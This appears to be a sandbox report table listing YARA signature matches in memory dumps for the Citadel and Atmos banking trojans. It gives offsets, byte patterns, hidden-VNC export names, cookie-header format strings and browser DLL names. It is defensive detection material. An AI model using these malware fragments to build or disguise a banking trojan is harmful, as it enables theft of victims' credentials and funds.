0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 E2 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 E2 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 E2 00
0000001B.00000000.2085005947.0000000000E20000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
00000019.00000000.2075479994.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 11 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 11 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 11 00
00000009.00000003.1790120113.0000000000110000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 B5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 B5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 B5 00
00000008.00000000.1766360463.0000000000B50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000001.00000003.1729277094.00000000020F0000.00000004.00001000.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x13739:$MZ: 4D 5A 0x14cc7:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 40 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 40 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 40 00
00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000020.00000002.2973995755.0000000002530000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 01 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 01 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 01 00
00000017.00000000.2066606336.0000000000010000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 EE 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 EE 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 EE 00
0000001D.00000000.2096580735.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A5 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 A5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A5 00
00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000024.00000000.2120619904.0000000002CA0000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
00000021.00000002.2964235219.0000000002E50000.00000040.00000001.00020000.00000000.sdmp	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
